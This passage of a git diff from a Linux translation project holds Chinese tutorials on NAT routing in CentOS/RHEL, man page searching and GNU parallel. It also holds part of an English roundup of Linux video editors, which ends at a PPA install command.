我们需要为两个网卡都分配 IP 地址,一个本地网络的 IP(由我们的网络管理员提供),另一个是互联网 IP(由 ISP 提供)。 像这样:
|
||||
|
||||
```
|
||||
Ifcfg-en0s3 192.168.1.1 (LAN IP address)
|
||||
Ifcfg-en0s5 10.1.1.1 (WAN IP address)
|
||||
```
|
||||
|
||||
**注意** 不同 Linux 发行版的网卡名是不一样的。
|
||||
|
||||
现在准备工作完成了,可以进行配置了。
|
||||
|
||||
### 步骤 1 启用 IP 转发
|
||||
|
||||
第一步,我们启用 IP 转发。 这一步在 RHEL/CentOS 6 和 7 上是相同的。 运行
|
||||
|
||||
```
|
||||
$ sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
|
||||
但是这样会在系统重启后恢复。要让重启后依然生效需要打开
|
||||
|
||||
```
|
||||
$ vi /etc/sysctl.conf
|
||||
```
|
||||
|
||||
然后输入下面内容,
|
||||
|
||||
```
|
||||
net.ipv4.ip_forward = 1
|
||||
```
|
||||
|
||||
保存并退出。现在系统就启用 IP 转发了。
|
||||
|
||||
### 步骤 2 配置 IPtables/Firewalld 的规则
|
||||
|
||||
下一步我们需要启动 IPtables/firewalld 服务并配置 NAT 规则,
|
||||
|
||||
```
|
||||
$ systemctl start firewalld (For Centos/RHEL 7)
|
||||
$ service iptables start (For Centos/RHEL 6)
|
||||
```
|
||||
|
||||
然后运行下面命令来配置防火墙的 NAT 规则:
|
||||
|
||||
```
|
||||
CentOS/RHEL 6
|
||||
$ iptables -t nat -A POSTROUTING -o XXXX -j MASQUERADE
|
||||
$ service iptables restart
|
||||
CentOS/RHEL 7
|
||||
$ firewall-cmd -permanent -direct -passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24
|
||||
$ systemctl restart firewalld
|
||||
```
|
||||
这里,`XXXX` 是配置有外网 IP 的那个网卡名称。 这就将 Linux 机器配置成了路由器了, 下面我们就可以配置客户端然后测试路由器了。
|
||||
|
||||
### 步骤 3 配置客户端
|
||||
|
||||
要测试路由器,我们需要在客户端的网关设置成内网 IP, 本例中就是 192.168.1.1。 因此不管客户机是 Windows 还是 Linux, 请先确保网关是 192.168.1.1。 完成后, 打开终端或命令行并 `ping` 一个网站来测试客户端是否能访问互联网了:
|
||||
|
||||
```
|
||||
$ ping google.com
|
||||
```
|
||||
|
||||
我们也可以通过网络浏览器访问网站的方式来检查。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/
|
||||
|
||||
作者:[Shusain][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:https://www.facebook.com/linuxtechlab/
|
||||
[2]:https://twitter.com/LinuxTechLab
|
||||
[3]:https://plus.google.com/+linuxtechlab
|
181
published/20171215 Learn To Use Man Pages Efficiently.md
Normal file
181
published/20171215 Learn To Use Man Pages Efficiently.md
Normal file
@ -0,0 +1,181 @@
|
||||
学习如何高效地使用 man 页
|
||||
======
|
||||
|
||||
不久前,我们发布了一篇简短的指引描述了如何轻易地[回忆起忘记的 Linux 命令 ][1]。那篇指引对于无法记住命令的人来说真的非常有用。今天,我们就来学习一下如何高效而又迅速地从 man 页中获取你所需要的信息。如你所知,一个标准的 man 页分成很多个部分,每部分都有一个独立的标题。当你想查看特定的标志/选项时,可能需要向下滚动很长时间才能找到。这是个效率底下而且很耗时间的过程。这也是为什么学会高效使用 man 页来精确定位你想要的内容。
|
||||
|
||||
在本文中,我会分享一些常用的跟 man 页相关的重要技巧。
|
||||
|
||||
### 学习高效地使用 Man 页
|
||||
|
||||
#### 基础用法
|
||||
|
||||
我们都知道,我们可以使用类似下面的命令来打开关于某个命令(比如 `mkdir`)的 man 页:
|
||||
|
||||
```
|
||||
man mkdir
|
||||
```
|
||||
|
||||
可以使用 `空格`,`d`,`b` 以及上下箭头等来浏览 man 页。要跳转道 man 页的末尾,可以按 `End` 键而想跳转到 man 页的头部则可以按 `Home` 键。在当前打开的 man 页中按下 `h` 键会显示所有有用的键盘快捷键和一般用法。(LCTT 译注:这些快捷键其实是 man 所使用的 less 分页器的快捷键)
|
||||
|
||||
![][3]
|
||||
|
||||
按 `q` 可以退出 man 页。
|
||||
|
||||
#### 回忆起忘记的命令
|
||||
|
||||
对于那些不知道想要哪个命令的家伙,可以去查看一下我第一段中提到的那个链接。使用 man 页我们也能做到这一点。假设说,你想要创建一个目录,而你忘记了使用哪个命令来创建目录。
|
||||
|
||||
为了回忆起那个忘记的命令,可以将 man 和 `grep` 命令联用:
|
||||
|
||||
```
|
||||
man -k directory | grep create
|
||||
```
|
||||
|
||||
输出结果为:
|
||||
|
||||
```
|
||||
CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories
|
||||
libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system
|
||||
mkdir (2) - create a directory
|
||||
mkdirat (2) - create a directory
|
||||
mkdtemp (3) - create a unique temporary directory
|
||||
mkdtemp (3p) - create a unique directory or file
|
||||
mkfontdir (1) - create an index of X font files in a directory
|
||||
mklost+found (8) - create a lost+found directory on a mounted Linux second extended file。。。
|
||||
mkstemp (3p) - create a unique directory
|
||||
mktemp (1) - create a temporary file or directory
|
||||
pam_mkhomedir (8) - PAM module to create users home directory
|
||||
```
|
||||
|
||||
![][4]
|
||||
|
||||
你只需要阅读一下每个命令的描述然后挑选出合适的命令就行了。啊,现在你记起来了。`mkdir` 正式你想要的,对吧?就是那么简单。
|
||||
|
||||
#### 在 man 页中搜索
|
||||
|
||||
若你在 man 页中想要查找特定字符串。只需要输入 `/` (前斜线)再加上你想要搜索的字符串,像这样:
|
||||
|
||||
```
|
||||
/<search_string> 或 <pattern>
|
||||
```
|
||||
|
||||
假设你正在查看 `mount` 命令的 man 页,想要寻找关于 `-bind` 选项的相关信息。可以输入:
|
||||
|
||||
```
|
||||
/bind
|
||||
```
|
||||
|
||||
![][5]
|
||||
|
||||
当前 man 页中任何匹配搜索字符串的内容都会被高亮显示。
|
||||
|
||||
![][6]
|
||||
|
||||
按下 `n` 和 `SHIFT+n` 来查看下一个/上一个匹配的地方。
|
||||
|
||||
`/` 模式(或者说字符串)会向前搜索匹配行。你也可以使用 `?` 模式进行向后搜索。这当你在 man 页的末尾或中间位置时非常有用。
|
||||
|
||||
```
|
||||
?bind
|
||||
```
|
||||
|
||||
若想只显示匹配行,输入:
|
||||
|
||||
```
|
||||
&bind
|
||||
```
|
||||
|
||||
![][7]
|
||||
|
||||
使用这种方法,你无需使用 `n` 和 `SHIFT+n` 来滚动到下一个/上一个匹配的位置。`&` 模式只会显示那些包含搜索内容的行,其他的内容全都被省略掉。
|
||||
|
||||
#### 不打开 man 页而进行搜索
|
||||
|
||||
也可以在不打开 man 页的前提下搜索指定选项的信息。
|
||||
|
||||
比如,你想了解 `mkdir` 命令中的 `-m` 选项的相关信息。可以运行:
|
||||
|
||||
```
|
||||
man mkdir | grep -e '-m'
|
||||
```
|
||||
|
||||
或者,
|
||||
|
||||
```
|
||||
man mkdir | grep -- '-m'
|
||||
```
|
||||
|
||||
![][8]
|
||||
|
||||
这个命令会显示出 `mkdir` 命令 man 页中第一次出现 `-m` 时的内容。从上面命令中我们可以看到 `-m` 表示的是 “MODE”(`chmod`)。
|
||||
|
||||
如果你想阅读 `mkdir` 命令的完整 man 页,但是要跳过第一次出现 `-m` 之前的内容,可以使用下面命令:
|
||||
|
||||
```
|
||||
man mkdir | less +/-m
|
||||
```
|
||||
|
||||
![][9]
|
||||
|
||||
这是另一个例子:
|
||||
|
||||
```
|
||||
man mount | less +/--bind
|
||||
```
|
||||
|
||||
![][10]
|
||||
|
||||
按下 `n` 或 `SHIFT+n` 可以浏览下一个/上一个匹配的位置。
|
||||
|
||||
参考阅读:[每个 Linux 用户都应该知道的 3 个 man 页替代品][11]。
|
||||
|
||||
#### 将完整的 man 页导出到文本文件中
|
||||
|
||||
我们可以将指定命令的完整 man 页导出成文本文件。方法是运行下面命令:
|
||||
|
||||
```
|
||||
man mount > mount.txt
|
||||
```
|
||||
|
||||
该命令会将 `mount` 命令的 man 页导出到当前目录的 `mount.txt` 文件中。
|
||||
|
||||
也可以获取一个简化版的 man 页,没有退格和下划线,方法是使用下面命令。
|
||||
|
||||
```
|
||||
man mount | col -b > mount.txt
|
||||
```
|
||||
|
||||
要了解更多关于 man 页的详细信息,运行:
|
||||
|
||||
```
|
||||
man man
|
||||
```
|
||||
|
||||
该命令会显示出关于 man 的 man 页。这些技巧都很基础但很实用。它们会节省你很多的时间而且能免去很多的滚动操作。
|
||||
|
||||
今天的内容就到这了。希望对你有帮助。更多好文即将到来。准备好哦!
|
||||
|
||||
Cheers!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.ostechnix.com/learn-use-man-pages-efficiently/
|
||||
|
||||
作者:[SK][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.ostechnix.com/author/sk/
|
||||
[1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/
|
||||
[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
|
||||
[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png
|
||||
[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png
|
||||
[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png
|
||||
[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png
|
||||
[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png
|
||||
[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png
|
||||
[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png
|
||||
[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png
|
||||
[11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/
|
@ -0,0 +1,104 @@
|
||||
使用 parallel 利用起你的所有 CPU 资源
|
||||
======
|
||||
|
||||
bash 命令通常单线程运行。这意味着所有的处理工作只在单个 CPU 上执行。随着 CPU 规模的扩大以及核心数目的增加,这意味着只有一小部分的 CPU 资源用于处理你的工作。
|
||||
|
||||
当我们的工作受制于 CPU 处理数据的速度时,这些未使用的 CPU 资源能产生很大的效用。这种情况在进行多媒体转换(比如图片和视频转换)以及数据压缩中经常遇到。
|
||||
|
||||
本文中,我们将会使用 [parallel][1] 程序。parallel 会接受一个列表作为输入,然后在所有 CPU 核上并行地执行命令来处理该列表。Parallel 甚至会按顺序将结果输出到标准输出中,因此它可以用在管道中作为其他命令的标准输入。
|
||||
|
||||
### 如何使用 parallel
|
||||
|
||||
parallel 在标准输入中读取一个列表作为输入,然后创建多个指定命令的进程来处理这个列表,其格式为:
|
||||
|
||||
```
|
||||
list | parallel command
|
||||
```
|
||||
|
||||
这里的 list 可以由任何常见的 bash 命令创建,例如:`cat`、`grep`、`find`。这些命令的结果通过管道从它们的标准输出传递到 parallel 的标准输入,像这样:
|
||||
|
||||
```
|
||||
find . -type f -name "*.log" | parallel
|
||||
```
|
||||
|
||||
跟 `find` 中使用 `-exec` 类似,`parallel` 使用 `{}` 来表示输入列表中的每个元素。下面这个例子中,`parallel` 会使用 `gzip` 压缩所有 `find` 命令输出的文件:
|
||||
|
||||
```
|
||||
find . -type f -name "*.log" | parallel gzip {}
|
||||
```
|
||||
|
||||
下面这些实际的使用 `parallel` 的例子可能会更容易理解一些。
|
||||
|
||||
### 使用 parallel 来进行 JPEG 压缩
|
||||
|
||||
在这个例子中,我收集了一些比较大的 `.jpg` 文件(大约 10MB 大小),要用 [Mozilla][3] 出品的 JPEG 图像压缩工具 [MozJPEG][2] 来进行处理。该工具会在尝试保持图像质量的同时减少 JPEG 图像文件的大小。这对降低网页加载时间很重要。
|
||||
|
||||
下面是一个普通的 `find` 命令,用来找出当前目录中的所有 `.jpg` 文件,然后通过 MozJPEG 包中提供的图像压缩工具 (`cjpeg`) 对其进行处理:
|
||||
|
||||
```
|
||||
find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';'
|
||||
```
|
||||
|
||||
总共耗时 `0m44.114s`。该命令运行时的 `top` 看起来是这样的:
|
||||
|
||||
![][4]
|
||||
|
||||
你可以看到,虽然有 8 个核可用,但实际只有单个线程在用单个核。
|
||||
|
||||
下面用 `parallel` 来运行相同的命令:
|
||||
|
||||
```
|
||||
find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {}
|
||||
```
|
||||
|
||||
这次压缩所有图像的时间缩减到了 `0m10.814s`。从 `top` 显示中可以很清楚地看出不同:
|
||||
|
||||
![][5]
|
||||
|
||||
所有 CPU 核都满负荷运行,有 8 个线程对应使用 8 个 CPU 核。
|
||||
|
||||
### parallel 与 gzip 连用
|
||||
|
||||
如果你需要压缩多个文件而不是一个大文件,那么 `parallel` 就能用来提高处理速度。如果你需要压缩单个文件而同时又想要利用所有的 CPU 核的话,那么你应该 `gzip` 的多线程替代品 [pigz][6]。
|
||||
|
||||
首先,我用随机数据创建了 100 个大约 1GB 的文件:
|
||||
|
||||
```
|
||||
for i in {1..100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done
|
||||
```
|
||||
|
||||
然而我用 `find -exec` 命令来进行压缩:
|
||||
|
||||
```
|
||||
find . -type f -name "file*" -exec gzip {} ';'
|
||||
```
|
||||
|
||||
总共耗时 `0m28.028s`,而且也是只利用了单核。
|
||||
|
||||
换成 `parallel` 版本:
|
||||
|
||||
```
|
||||
find . -type f -name "file*" | parallel gzip {}
|
||||
```
|
||||
|
||||
耗时减少到了 `0m5.774s`。
|
||||
|
||||
parallel 是一款非常好用的工具,应该加入到你的系统管理工具包中,在合适的场合它能帮你节省大量的时间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://bash-prompt.net/guides/parallell-bash/
|
||||
|
||||
作者:[Elliot Cooper][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://bash-prompt.net/about
|
||||
[1]:https://www.gnu.org/software/parallel/
|
||||
[2]:https://github.com/mozilla/mozjpeg
|
||||
[3]:https://www.mozilla.org/
|
||||
[4]:https://bash-prompt.net/images/guides/parallell-bash/top-single-core-100.png
|
||||
[5]:https://bash-prompt.net/images/guides/parallell-bash/top-all-cores-100.png
|
||||
[6]:https://zlib.net/pigz/
|
@ -0,0 +1,514 @@
|
||||
9 Best Free Video Editing Software for Linux In 2017
|
||||
======
|
||||
**Brief: Here are best video editors for Linux, their feature, pros and cons and how to install them on your Linux distributions.**
|
||||
|
||||
![Best Video editors for Linux][1]
|
||||
|
||||
![Best Video editors for Linux][2]
|
||||
|
||||
We have discussed [best photo management applications for Linux][3], [best code editors for Linux][4] in similar articles in the past. Today we shall see the **best video editing software for Linux**.
|
||||
|
||||
When asked about free video editing software, Windows Movie Maker and iMovie is what most people often suggest.
|
||||
|
||||
Unfortunately, both of them are not available for GNU/Linux. But you don't need to worry about it, we have pooled together a list of **best free video editors** for you.
|
||||
|
||||
## Best Video Editors for Linux
|
||||
|
||||
Let's have a look at the best free video editing software for Linux below. Here's a quick summary if you think the article is too long to read. You can click on the links to jump to the relevant section of the article:
|
||||
|
||||
Video Editors Main Usage Type Kdenlive General purpose video editing Free and Open Source OpenShot General purpose video editing Free and Open Source Shotcut General purpose video editing Free and Open Source Flowblade General purpose video editing Free and Open Source Lightworks Professional grade video editing Freemium Blender Professional grade 3D editing Free and Open Source Cinelerra General purpose video editing Free and Open Source DaVinci Resolve Professional grade video editing Freemium VidCutter Simple video split and merge Free and Open Source
|
||||
|
||||
### 1\. Kdenlive
|
||||
|
||||
![Kdenlive-free video editor on ubuntu][1]
|
||||
|
||||
![Kdenlive-free video editor on ubuntu][5]
|
||||
[Kdenlive][6] is a free and [open source][7] video editing software from [KDE][8] that provides support for dual video monitors, a multi-track timeline, clip list, customizable layout support, basic effects, and basic transitions.
|
||||
|
||||
It supports a wide variety of file formats and a wide range of camcorders and cameras including Low resolution camcorder (Raw and AVI DV editing), Mpeg2, mpeg4 and h264 AVCHD (small cameras and camcorders), High resolution camcorder files, including HDV and AVCHD camcorders, Professional camcorders, including XDCAM-HD™ streams, IMX™ (D10) streams, DVCAM (D10) , DVCAM, DVCPRO™, DVCPRO50™ streams and DNxHD™ streams.
|
||||
|
||||
If you are looking for an iMovie alternative for Linux, Kdenlive would be your best bet.
|
||||
|
||||
#### Kdenlive features
|
||||
|
||||
* Multi-track video editing
|
||||
* A wide range of audio and video formats
|
||||
* Configurable interface and shortcuts
|
||||
* Easily create tiles using text or images
|
||||
* Plenty of effects and transitions
|
||||
* Audio and video scopes make sure the footage is correctly balanced
|
||||
* Proxy editing
|
||||
* Automatic save
|
||||
* Wide hardware support
|
||||
* Keyframeable effects
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor
|
||||
* Not too complicated for those who are familiar with video editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* It may still be confusing if you are looking for something extremely simple
|
||||
* KDE applications are infamous for being bloated
|
||||
|
||||
|
||||
|
||||
#### Installing Kdenlive
|
||||
|
||||
Kdenlive is available for all major Linux distributions. You can simply search for it in your software center. Various packages are available in the [download section of Kdenlive website][9].
|
||||
|
||||
Command line enthusiasts can install it from the terminal by running the following command in Debian and Ubuntu-based Linux distributions:
|
||||
```
|
||||
sudo apt install kdenlive
|
||||
```
|
||||
|
||||
### 2\. OpenShot
|
||||
|
||||
![Openshot-free-video-editor-on-ubuntu][1]
|
||||
|
||||
![Openshot-free-video-editor-on-ubuntu][10]
|
||||
|
||||
[OpenShot][11] is another multi-purpose video editor for Linux. OpenShot can help you create videos with transitions and effects. You can also adjust audio levels. Of course, it support of most formats and codecs.
|
||||
|
||||
You can also export your film to DVD, upload to YouTube, Vimeo, Xbox 360, and many common video formats. OpenShot is a tad bit simpler than Kdenlive. So if you need a video editor with a simple UI OpenShot is a good choice.
|
||||
|
||||
There is also a neat documentation to [get you started with OpenShot][12].
|
||||
|
||||
#### OpenShot features
|
||||
|
||||
* Cross-platform, available on Linux, macOS, and Windows
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Powerful curve-based Keyframe animations
|
||||
* Desktop integration with drag and drop support
|
||||
* Unlimited tracks or layers
|
||||
* Clip resizing, scaling, trimming, snapping, rotation, and cutting
|
||||
* Video transitions with real-time previews
|
||||
* Compositing, image overlays and watermarks
|
||||
* Title templates, title creation, sub-titles
|
||||
* Support for 2D animation via image sequences
|
||||
* 3D animated titles and effects
|
||||
* SVG friendly for creating and including vector titles and credits
|
||||
* Scrolling motion picture credits
|
||||
* Frame accuracy (step through each frame of video)
|
||||
* Time-mapping and speed changes on clips
|
||||
* Audio mixing and editing
|
||||
* Digital video effects, including brightness, gamma, hue, greyscale, chroma key etc
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor for average video editing needs
|
||||
* Available on Windows and macOS along with Linux
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* It may be simple but if you are extremely new to video editing, there is definitely a learning curve involved here
|
||||
* You may still not find up to the mark of a professional-grade, movie making editing software
|
||||
|
||||
|
||||
|
||||
#### Installing OpenShot
|
||||
|
||||
OpenShot is also available in the repository of all major Linux distributions. You can simply search for it in your software center. You can also get it from its [official website][13].
|
||||
|
||||
My favorite way is to use the following command in Debian and Ubuntu-based Linux distributions:
|
||||
```
|
||||
sudo apt install openshot
|
||||
```
|
||||
|
||||
### 3\. Shotcut
|
||||
|
||||
![Shotcut Linux video editor][1]
|
||||
|
||||
![Shotcut Linux video editor][14]
|
||||
|
||||
[Shotcut][15] is another video editor for Linux that can be put in the same league as Kdenlive and OpenShot. While it does provide similar features as the other two discussed above, Shotcut is a bit advanced with support for 4K videos.
|
||||
|
||||
Support for a number of audio, video format, transitions and effects are some of the numerous features of Shotcut. External monitor is also supported here.
|
||||
|
||||
There is a collection of video tutorials to [get you started with Shotcut][16]. It is also available for Windows and macOS so you can use your learning on other operating systems as well.
|
||||
|
||||
#### Shotcut features
|
||||
|
||||
* Cross-platform, available on Linux, macOS, and Windows
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Native timeline editing
|
||||
* Mix and match resolutions and frame rates within a project
|
||||
* Audio filters, mixing and effects
|
||||
* Video transitions and filters
|
||||
* Multitrack timeline with thumbnails and waveforms
|
||||
* Unlimited undo and redo for playlist edits including a history view
|
||||
* Clip resizing, scaling, trimming, snapping, rotation, and cutting
|
||||
* Trimming on source clip player or timeline with ripple option
|
||||
* External monitoring on an extra system display/monitor
|
||||
* Hardware support
|
||||
|
||||
|
||||
|
||||
You can read about more features [here][17].
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor for common video editing needs
|
||||
* Support for 4K videos
|
||||
* Available on Windows and macOS along with Linux
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Too many features reduce the simplicity of the software
|
||||
|
||||
|
||||
|
||||
#### Installing Shotcut
|
||||
|
||||
Shotcut is available in [Snap][18] format. You can find it in Ubuntu Software Center. For other distributions, you can get the executable file from its [download page][19].
|
||||
|
||||
### 4\. Flowblade
|
||||
|
||||
![Flowblade movie editor on ubuntu][1]
|
||||
|
||||
![Flowblade movie editor on ubuntu][20]
|
||||
|
||||
[Flowblade][21] is a multitrack non-linear video editor for Linux. Like the above-discussed ones, this too is a free and open source software. It comes with a stylish and modern user interface.
|
||||
|
||||
Written in Python, it is designed to provide a fast, and precise. Flowblade has focused on providing the best possible experience on Linux and other free platforms. So there's no Windows and OS X version for now. Feels good to be a Linux exclusive.
|
||||
|
||||
You also get a decent [documentation][22] to help you use all of its features.
|
||||
|
||||
#### Flowblade features
|
||||
|
||||
* Lightweight application
|
||||
* Provide simple interface for simple tasks like split, merge, overwrite etc
|
||||
* Plenty of audio and video effects and filters
|
||||
* Supports [proxy editing][23]
|
||||
* Drag and drop support
|
||||
* Support for a wide range of video, audio, and image formats
|
||||
* Batch rendering
|
||||
* Watermarks
|
||||
* Video transitions and filters
|
||||
* Multitrack timeline with thumbnails and waveforms
|
||||
|
||||
|
||||
|
||||
You can read about more [Flowblade features][24] here.
|
||||
|
||||
#### Pros
|
||||
|
||||
* Lightweight
|
||||
* Good for general purpose video editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not available on other platforms
|
||||
|
||||
|
||||
|
||||
#### Installing Flowblade
|
||||
|
||||
Flowblade should be available in the repositories of all major Linux distributions. You can install it from the software center. More information is available on its [download page][25].
|
||||
|
||||
Alternatively, you can install Flowblade in Ubuntu and other Ubuntu based systems, using the command below:
|
||||
```
|
||||
sudo apt install flowblade
|
||||
```
|
||||
|
||||
### 5\. Lightworks
|
||||
|
||||
![Lightworks running on ubuntu 16.04][1]
|
||||
|
||||
![Lightworks running on ubuntu 16.04][26]
|
||||
|
||||
If you looking for a video editor software that has more feature, this is the answer. [Lightworks][27] is a cross-platform professional video editor, available for Linux, Mac OS X and Windows.
|
||||
|
||||
It is an award-winning professional [non-linear editing][28] (NLE) software that supports resolutions up to 4K as well as video in SD and HD formats.
|
||||
|
||||
Lightworks is available for Linux, however, it is not open source.
|
||||
|
||||
This application has two versions:
|
||||
|
||||
* Lightworks Free
|
||||
* Lightworks Pro
|
||||
|
||||
|
||||
|
||||
Pro version has more features such as higher resolution support, 4K and Blue Ray support etc.
|
||||
|
||||
Extensive documentation is available on its [website][29]. You can also refer to videos at [Lightworks video tutorials page][30]
|
||||
|
||||
#### Lightworks features
|
||||
|
||||
* Cross-platform
|
||||
* Simple & intuitive User Interface
|
||||
* Easy timeline editing & trimming
|
||||
* Real-time ready to use audio & video FX
|
||||
* Access amazing royalty-free audio & video content
|
||||
* Lo-Res Proxy workflows for 4K
|
||||
* Export video for YouTube/Vimeo, SD/HD, up to 4K
|
||||
* Drag and drop support
|
||||
* Wide variety of audio and video effects and filters
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Professional, feature-rich video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Limited free version
|
||||
|
||||
|
||||
|
||||
#### Installing Lightworks
|
||||
|
||||
Lightworks provides DEB packages for Debian and Ubuntu-based Linux distributions and RPM packages for Fedora-based Linux distributions. You can find the packages on its [download page][31].
|
||||
|
||||
### 6\. Blender
|
||||
|
||||
![Blender running on Ubuntu 16.04][1]
|
||||
|
||||
![Blender running on Ubuntu 16.04][32]
|
||||
|
||||
[Blender][33] is a professional, industry-grade open source, cross-platform video editor. It is popular for 3D works. Blender has been used in several Hollywood movies including Spider Man series.
|
||||
|
||||
Although originally designed for produce 3D modeling, but it can also be used for video editing and input capabilities with a variety of formats.
|
||||
|
||||
#### Blender features
|
||||
|
||||
* Live preview, luma waveform, chroma vectorscope and histogram displays
|
||||
* Audio mixing, syncing, scrubbing and waveform visualization
|
||||
* Up to 32 slots for adding video, images, audio, scenes, masks and effects
|
||||
* Speed control, adjustment layers, transitions, keyframes, filters and more
|
||||
|
||||
|
||||
|
||||
You can read about more features [here][34].
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Professional grade editing
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Complicated
|
||||
* Mainly for 3D animation, not focused on regular video editing
|
||||
|
||||
|
||||
|
||||
#### Installing Blender
|
||||
|
||||
The latest version of Blender can be downloaded from its [download page][35].
|
||||
|
||||
### 7\. Cinelerra
|
||||
|
||||
![Cinelerra video editor for Linux][1]
|
||||
|
||||
![Cinelerra video editor for Linux][36]
|
||||
|
||||
[Cinelerra][37] has been available since 1998 and has been downloaded over 5 million times. It was the first video editor to provide non-linear editing on 64-bit systems back in 2003. It was a go-to video editor for Linux users at that time but it lost its sheen afterward as some developers abandoned the project.
|
||||
|
||||
Good thing is that its back on track and is being developed actively again.
|
||||
|
||||
There is some [interesting backdrop story][38] about how and why Cinelerra was started if you care to read.
|
||||
|
||||
#### Cinelerra features
|
||||
|
||||
* Non-linear editing
|
||||
* Support for HD videos
|
||||
* Built-in frame renderer
|
||||
* Various video effects
|
||||
* Unlimited layers
|
||||
* Split pane editing
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* All-purpose video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for beginners
|
||||
* No packages available
|
||||
|
||||
|
||||
|
||||
#### Installing Cinelerra
|
||||
|
||||
You can download the source code from [SourceForge][39]. More information on its [download page][40].
|
||||
|
||||
### 8\. DaVinci Resolve
|
||||
|
||||
![DaVinci Resolve video editor][1]
|
||||
|
||||
![DaVinci Resolve video editor][41]
|
||||
|
||||
If you want Hollywood level video editing, use the tool the professionals use in Hollywood. [DaVinci Resolve][42] from Blackmagic is what professionals are using for editing movies and tv shows.
|
||||
|
||||
DaVinci Resolve is not your regular video editor. It's a full-fledged editing tool that provides editing, color correction and professional audio post-production in a single application.
|
||||
|
||||
DaVinci Resolve is not open source. Like LightWorks, it too provides a free version for Linux. The pro version costs $300.
|
||||
|
||||
#### DaVinci Resolve features
|
||||
|
||||
* High-performance playback engine
|
||||
* All kind of edit types such as overwrite, insert, ripple overwrite, replace, fit to fill, append at end
|
||||
* Advanced Trimming
|
||||
* Audio Overlays
|
||||
* Multicam Editing allows editing footage from multiple cameras in real-time
|
||||
* Transition and filter-effects
|
||||
* Speed effects
|
||||
* Timeline curve editor
|
||||
* Non-linear editing for VFX
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Professional grade video editor
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for average editing
|
||||
* Not open source
|
||||
* Some features are not available in the free version
|
||||
|
||||
|
||||
|
||||
#### Installing DaVinci Resolve
|
||||
|
||||
You can download DaVinci Resolve for Linux from [its website][42]. You'll have to register, even for the free version.
|
||||
|
||||
### 9\. VidCutter
|
||||
|
||||
![VidCutter video editor for Linux][1]
|
||||
|
||||
![VidCutter video editor for Linux][43]
|
||||
|
||||
Unlike all the other video editors discussed here, [VidCutter][44] is utterly simple. It doesn't do much except splitting videos and merging. But at times you just need this and VidCutter gives you just that.
|
||||
|
||||
#### VidCutter features
|
||||
|
||||
* Cross-platform app available for Linux, Windows and MacOS
|
||||
* Supports most of the common video formats such as: AVI, MP4, MPEG 1/2, WMV, MP3, MOV, 3GP, FLV etc
|
||||
* Simple interface
|
||||
* Trims and merges the videos, nothing more than that
|
||||
|
||||
|
||||
|
||||
#### Pros
|
||||
|
||||
* Cross-platform
|
||||
* Good for simple split and merge
|
||||
|
||||
|
||||
|
||||
#### Cons
|
||||
|
||||
* Not suitable for regular video editing
|
||||
* Crashes often
|
||||
|
||||
|
||||
|
||||
#### Installing VidCutter
|
||||
|
||||
If you are using Ubuntu-based Linux distributions, you can use the official PPA:
|
||||
```
|
||||
sudo add-apt-repository ppa:ozmartian/apps
|
||||
